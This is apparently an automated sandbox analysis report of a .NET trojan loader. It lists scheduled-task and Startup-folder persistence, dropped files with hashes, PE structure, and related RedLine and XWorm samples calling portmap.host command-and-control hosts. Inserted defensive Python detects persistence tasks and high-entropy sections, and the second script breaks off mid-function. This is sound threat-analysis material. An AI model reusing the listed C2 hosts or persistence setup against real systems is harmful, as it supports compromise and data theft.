                      Classification:mal100.troj.spyw.evad.winEXE@21/18@1/1
                      EGA Information:
                      • Successful, ratio: 75%
                      HCA Information:
                      • Successful, ratio: 97%
                      • Number of executed functions: 204
                      • Number of non-executed functions: 11
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target xNgpESfQOvfb.exe, PID 380 because it is empty
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                      Time | Type | Description
                      10:29:03 | API Interceptor | 9388041x Sleep call for process: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe modified
                      10:29:07 | API Interceptor | 35x Sleep call for process: powershell.exe modified
                      10:29:09 | API Interceptor | 30x Sleep call for process: xNgpESfQOvfb.exe modified
                      16:29:08 | Task Scheduler | Run new task: xNgpESfQOvfb path: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe
                      16:29:14 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                      193.161.193.99 | Yq5Gp2g2vB.exe | malicious | RedLine | okmaq-24505.portmap.host:24505/
                      193.161.193.99 | JnBNepHH7K.exe | malicious | AsyncRAT, RedLine | exara32-64703.portmap.host:64703/
                      193.161.193.99 | 99SKW728vf.exe | malicious | RedLine | lottie9nwtina-55339.portmap.host:55339/
                      193.161.193.99 | amazoninvoiceAF0388d83739dee83479171dbcf.exe | malicious | RedLine | tete2792-22120.portmap.host:22120//
                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                      moneymaker-30608.portmap.host | SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe | malicious | PureLog Stealer, XWorm | 193.161.193.99
                      moneymaker-30608.portmap.host | SecuriteInfo.com.Win32.RATX-gen.31110.7671.exe | malicious | XWorm | 193.161.193.99
                      moneymaker-30608.portmap.host | SecuriteInfo.com.Win32.CrypterX-gen.2593.22035.exe | malicious | XWorm | 193.161.193.99
                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                      BITREE-ASRU | SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe | malicious | PureLog Stealer, XWorm | 193.161.193.99
                      BITREE-ASRU | SecuriteInfo.com.Win32.RATX-gen.31110.7671.exe | malicious | XWorm | 193.161.193.99
                      BITREE-ASRU | SecuriteInfo.com.Win32.CrypterX-gen.2593.22035.exe | malicious | XWorm | 193.161.193.99
                      BITREE-ASRU | 0aXmWlKxOj.exe | malicious | XWorm | 193.161.193.99
                      BITREE-ASRU | DriverUpdt.exe | malicious | XWorm | 193.161.193.99
                      BITREE-ASRU | password.exe | malicious | SugarDump, XWorm | 193.161.193.99
                      BITREE-ASRU | Project Al Ain (Hilli & Al Fou#U2019ah) Parks.vbe | malicious | StormKitty, XWorm | 193.161.193.99
                      BITREE-ASRU | 9Ok3QP5FFV.exe | malicious | AsyncRAT, DcRat | 193.161.193.99
                      BITREE-ASRU | Client.exe | malicious | Quasar | 193.161.193.99
                      BITREE-ASRU | siuu.exe | malicious | XWorm | 193.161.193.99
                      No context
                      No context
                      Process:C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1415
                      Entropy (8bit):5.352427679901606
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                      MD5:97AD91F1C1F572C945DA12233082171D
                      SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                      SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
                      SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                      Malicious:true
                      Reputation:moderate, very likely benign file
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc
                      Process:C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1415
                      Entropy (8bit):5.352427679901606
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                      MD5:97AD91F1C1F572C945DA12233082171D
                      SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                      SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
                      SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                      Malicious:false
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:modified
                      Size (bytes):2232
                      Entropy (8bit):5.379401388151058
                      Encrypted:false
                      SSDEEP:48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZeUyus:fLHxvIIwLgZ2KRHWLOugos
                      MD5:8B31787758671196183789E550CE0BD7
                      SHA1:E42CBA6033293DB707F88FEFA1362042DD8896C1
                      SHA-256:4667F2971C25BE1476BD553E43FDB7E452768B17670044A4DB1B432C7B8C96AB
                      SHA-512:74169910DC0EDDA75ECDCFC6AFF2842692F6EFB165935AD6CD849899D373C41A6628D6C6679ADBD89BEF8F73110BF01F14C3FEDBC7C1493A00A6EE159BD76621
                      Malicious:false
                      Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                      Process:C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):29
                      Entropy (8bit):3.598349098128234
                      Encrypted:false
                      SSDEEP:3:rRSFYJKXzovNsra:EFYJKDoWra
                      MD5:2C11513C4FAB02AEDEE23EC05A2EB3CC
                      SHA1:59177C177B2546FBD8EC7688BAD19D08D32640DE
                      SHA-256:BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
                      SHA-512:08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
                      Malicious:false
                      Preview:....### explorer ###..[WIN]r
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Six further dropped-file entries follow with exactly the same process (C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), size, hashes, verdict and preview as the entry above.
                      Process:C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe
                      File Type:XML 1.0 document, ASCII text
                      Category:dropped
                      Size (bytes):1599
                      Entropy (8bit):5.099004056519076
                      Encrypted:false
                      SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtL24xvn:cge7QYrFdOFzOzN33ODOiDdKrsuTaYv
                      MD5:00D3C36BF0ED208575B2A877DDB1A2FD
                      SHA1:203F0ED5A50927FE1E48CBBB434D3D092C112EC3
                      SHA-256:F0A808B66E8826EE981AAB2833D829736673C728EAC692812A20015847490B75
                      SHA-512:60FEE7236A7ECD8B58F4303D51A7112B67512337BA2232EF71164846F88440F2F73E83A12F404161E0167E4AE0C3BAED048FFB19D9FDA258ED866B84797315EF
                      Malicious:false
                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
                      Process:C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                      File Type:XML 1.0 document, ASCII text
                      Category:dropped
                      Size (bytes):1599
                      Entropy (8bit):5.099004056519076
                      Encrypted:false
                      SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtL24xvn:cge7QYrFdOFzOzN33ODOiDdKrsuTaYv
                      MD5:00D3C36BF0ED208575B2A877DDB1A2FD
                      SHA1:203F0ED5A50927FE1E48CBBB434D3D092C112EC3
                      SHA-256:F0A808B66E8826EE981AAB2833D829736673C728EAC692812A20015847490B75
                      SHA-512:60FEE7236A7ECD8B58F4303D51A7112B67512337BA2232EF71164846F88440F2F73E83A12F404161E0167E4AE0C3BAED048FFB19D9FDA258ED866B84797315EF
                      Malicious:true
                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
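The two task XML files above register a LogonTrigger for the interactive user at LeastPrivilege; the preview is cut off before the <Actions> element, so the page does not show what the task launches. The following is an added triage example (not code from the report or from Joe Sandbox): it parses Task Scheduler XML and flags tasks that fire at logon and run a binary from a user-writable location. The <Actions> block in the constructed sample is an assumption; its command path is reused from the dropped .lnk target (C:\Users\user\AppData\Roaming\XClient.exe) purely for illustration, and the benign counterpart is made up.

```python
"""Flag Task Scheduler XML that persists a logon-triggered binary from a
user-writable path (added example; not part of the Joe Sandbox report)."""
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Path fragments that any interactive user can write to; a scheduled task whose
# action lives under one of these is a common user-level persistence pattern.
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\users\\public\\", "\\temp\\", "\\programdata\\")

# Constructed sample. RegistrationInfo/Triggers/Principals mirror the preview in
# the report; the <Actions> block is an ASSUMPTION (the preview is cut off before
# it) and the command path is reused from the dropped .lnk target for illustration.
SUSPICIOUS_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2014-10-25T14:27:44.8929027</Date>
    <Author>user-PC\user</Author>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <UserId>user-PC\user</UserId>
    </LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>user-PC\user</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\user\AppData\Roaming\XClient.exe</Command>
    </Exec>
  </Actions>
</Task>"""

# Constructed benign counterpart: time-triggered vendor updater under Program Files.
BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <Enabled>true</Enabled>
      <StartBoundary>2024-01-01T03:00:00</StartBoundary>
    </TimeTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Program Files\ExampleVendor\Updater.exe</Command>
    </Exec>
  </Actions>
</Task>"""


def parse_task(xml_text):
    """Extract the fields that matter for a persistence triage decision."""
    root = ET.fromstring(xml_text)

    def text(path):
        return (root.findtext(path, default="", namespaces=NS) or "").strip()

    return {
        "author": text("t:RegistrationInfo/t:Author"),
        "logon_trigger": root.find("t:Triggers/t:LogonTrigger", NS) is not None,
        "run_level": text("t:Principals/t:Principal/t:RunLevel"),
        "commands": [(c.text or "").strip()
                     for c in root.findall("t:Actions/t:Exec/t:Command", NS)],
    }


def is_user_persistence(task):
    """True when the task fires at logon and runs something from a user-writable path."""
    if not task["logon_trigger"]:
        return False
    return any(marker in cmd.lower()
               for cmd in task["commands"]
               for marker in USER_WRITABLE_MARKERS)


if __name__ == "__main__":
    for label, xml in (("suspicious", SUSPICIOUS_TASK_XML), ("benign", BENIGN_TASK_XML)):
        task = parse_task(xml)
        print(label, task["commands"], "->", "FLAG" if is_user_persistence(task) else "ok")
```

On a live host the same parser can be pointed at the files under C:\Windows\System32\Tasks (they are stored as UTF-16 XML, which ET.fromstring accepts as bytes). A LeastPrivilege run level, as here, does not make the task harmless: it is exactly what a user-context implant without UAC bypass needs to survive a reboot.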
                      Process:C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jul 18 13:29:12 2024, mtime=Thu Jul 18 13:29:12 2024, atime=Thu Jul 18 13:29:12 2024, length=641536, window=hide
                      Category:dropped
                      Size (bytes):767
                      Entropy (8bit):5.062405013006843
                      Encrypted:false
                      SSDEEP:12:82TyE24Ts4pnu8ChZ1AlXIsY//AttajLLRyejAhG+HkPhUGmV:82Ty+TtD21AlXUo4LR/AhGFZhm
                      MD5:A54D89C82B2CAC873043C7EC8CA6FAFC
                      SHA1:47D0066028824907FFACD5B742DD48610D661499
                      SHA-256:0A570FC5F0AE0E44DFF5A200FEFE342D22859AC2354F7234E9AA6FCDC094C0B0
                      SHA-512:4357489531A2AD95830F6A399A621287AAACDAF3BE113C1F80664BA2D953DC3F9CC9605BF459E1C886E0A3FF3DB0EA866BE87D965784AC0F894430C37F952985
                      Malicious:false
                      Preview:L..................F.... ...................................................v.:..DG..Yr?.D..U..k0.&...&.......$..S...?.=......X..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.X.s...........................^.A.p.p.D.a.t.a...B.V.1......X.s..Roaming.@......EW<2.X.s..../......................U..R.o.a.m.i.n.g.....b.2......X.s .XClient.exe.H.......X.s.X.s..........................y...X.C.l.i.e.n.t...e.x.e.......\...............-.......[............E.......C:\Users\user\AppData\Roaming\XClient.exe........\.....\.....\.....\.....\.X.C.l.i.e.n.t...e.x.e.`.......X.......045012...........hT..CrF.f4... .M...Jc...-...-$..hT..CrF.f4... .M...Jc...-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                      Process:C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):641536
                      Entropy (8bit):7.707880699127507
                      Encrypted:false
                      SSDEEP:12288:yg/dslRnGwJu7swwXkKz9gD6dFd2yARiLBIDEAm7AZKzK0ffrrgc8c+:yg/dslRGOu7jwUHD6d/yR7reBfffr0c8
                      MD5:DC674885E842E9C05644CE23F5D8B665
                      SHA1:82B33F0734FA62DDD93F1DFDC34285E8713B3E66
                      SHA-256:EA098F4397146A44801177898A66A0DA04690D51A242C5687B5E2D33AFAE1BFD
                      SHA-512:026D5A4D508813708C31AE9BD3C0CEB245E6553360B94200467EF86814FB47890C321BA907379402255E3C8F57F3B75DE926D8F9AB9EE7B278C783A1126871E7
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 32%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................... ............@.................................X...S.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......tu...h...........................................................0..A....... >........%.....(......... J........%.?...(.....@...(E...*.....&*....0..@........r...ps....}......}......}....+..(.......( .....(.....+..(.....*..*...*...*...*...*...*...*..0...........s|.....o......(.....*...0...........s......o......(.....*...0...........s$.....o......(.....*...0...........s......o......(.....*...0...........sI.....o......(.....*...0..........~@..........E...................
                      A second dropped copy follows with exactly the same process, size, hashes, AV results and preview as the entry above.
                      Process:C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Preview:[ZoneTransfer]....ZoneId=0
                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Entropy (8bit):7.707880699127507
                      TrID:
                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      • Win32 Executable (generic) a (10002005/4) 49.75%
                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                      • Windows Screen Saver (13104/52) 0.07%
                      • Generic Win/DOS Executable (2004/3) 0.01%
                      File name:SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                      File size:641'536 bytes
                      MD5:dc674885e842e9c05644ce23f5d8b665
                      SHA1:82b33f0734fa62ddd93f1dfdc34285e8713b3e66
                      SHA256:ea098f4397146a44801177898a66a0da04690d51a242c5687b5e2d33afae1bfd
                      SHA512:026d5a4d508813708c31ae9bd3c0ceb245e6553360b94200467ef86814fb47890c321ba907379402255e3c8f57f3b75de926d8f9ab9ee7b278c783a1126871e7
                      SSDEEP:12288:yg/dslRnGwJu7swwXkKz9gD6dFd2yARiLBIDEAm7AZKzK0ffrrgc8c+:yg/dslRGOu7jwUHD6d/yR7reBfffr0c8
                      TLSH:03D4D08C77BAEF96D53963F5A552862043F8912A1169F7430FCB28D61EE4FC08642F87
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................... ............@................................
                      Icon Hash:00928e8e8686b000
                      Entrypoint:0x49deae
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Time Stamp:0x669907A4 [Thu Jul 18 12:16:36 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                      Instruction
                      jmp dword ptr [00402000h]
                      (followed by zero padding, which the disassembler renders as a run of "add byte ptr [eax], al")
                      0x402000 is the image base 0x400000 plus the IAT at RVA 0x2000 (see IMAGE_DIRECTORY_ENTRY_IAT in the data directories), whose only entry is mscoree.dll!_CorExeMain. This is the standard native stub of a managed executable: the program logic lives in the CIL referenced by the COM descriptor, not at the native entrypoint.
                      Name | Virtual Address | Virtual Size | Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9de58 | 0x53 | .text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x9e000 | 0x600 | .rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa0000 | 0xc | .reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                      .text | 0x2000 | 0x9beb4 | 0x9c000 | 2dbb94c188855840329073fd36f7c3c3 | False | 0.8617757161458334 | data | 7.717538065664358 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rsrc | 0x9e000 | 0x600 | 0x600 | 4bd78149f85eec5346f367bfc2049fa4 | False | 0.3971354166666667 | data | 3.937337695651304 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc | 0xa0000 | 0xc | 0x200 | e0c8eaabc21b0e87a0902c4bdc54af4e | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                      Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                      RT_VERSION | 0x9e090 | 0x2cc | data | | | 0.42877094972067037
                      RT_MANIFEST | 0x9e36c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                      DLL | Import
                      mscoree.dll | _CorExeMain
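The section table is the static tell here: .text is marked CODE|EXECUTE and has an entropy of 7.72 bits per byte, close to the 8.0 ceiling, which for a 600 KB .NET assembly with a single mscoree.dll import means compressed or encrypted payload rather than plain CIL. The following is an added example (not code from the report or from Joe Sandbox) that walks a PE section table with the standard library only, computes the same 8-bit Shannon entropy the report's Entropy column shows, and flags executable sections above a threshold. The image it parses is constructed inline and is not the sample from the report.

```python
"""Per-section entropy check for a PE image (added example, not from the report).
Uses only the standard library; the image parsed here is constructed inline."""
import math
import struct
from collections import Counter

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_CNT_CODE = 0x00000020


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0), as in the report's Entropy column."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes):
    """Walk the PE section table and return name, layout, flags and entropy per section."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
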